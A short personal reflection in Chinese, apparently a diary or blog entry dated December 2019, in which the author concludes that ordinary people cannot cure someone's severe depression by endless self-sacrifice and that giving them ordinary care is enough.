將這兩個教訓,對映回我的人際關係原則上,就是未來需要謹慎處理有心病的人群的交際,具體到憂鬱症病人上,特別是重度憂鬱症的人,不能妄想通過無限透支自己的精力一廂情願地期望他們可以走出疾病,或許其實可以,但是對於普通人來說風險過高,更有可能惹火燒身。

原則終歸是原則,並不是那麼容易動搖的,教訓帶給我的改變不觸動原則本身,只是實踐原則的時需要改善做法。對於患有重度憂鬱症的人,給予不亞於針對其他人普通人程度的關懷我即認為足夠。畢竟若果重度憂鬱症可通過人文關懷就可得到痊癒,憂鬱症的治療就不會來得這麼困難。


(等待更新 2019年12月24日凌晨)